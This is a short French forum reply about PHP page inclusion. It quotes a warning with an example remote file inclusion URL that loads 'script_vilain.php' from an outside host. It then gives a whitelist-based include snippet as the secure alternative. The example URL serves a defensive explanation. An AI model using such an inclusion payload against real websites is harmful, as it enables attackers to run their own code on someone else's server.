Citation:
Envoyé par °Matthieu°
|
Il ne faut surtout pas faire ça !
Il suffirait de faire
http://......./index.php?page=http://monsite.fr/script_vilain.php
et je pourrais faire ce que je veux sur ton site.
dans ton url donne des noms au pages (contact, lien, membre...)
Construit un tableau où tu testeras tes pages
Code PHP:
$page = htmlentities($_GET['page']);
$test_page = array("contact", "lien", "membre" ...);
if(in_array($page,$test_page))
{
include($page.'.php');
}
else
{
include('default.php');
}
Apres pour ton edition de page, cela dépend de ce que tu veux éditer mais il va falloir que tu fasse une zone admin, avec des formulaires pour les pages que tu veux éditer ( je suppose que tu veux faire un script de news etc. ?)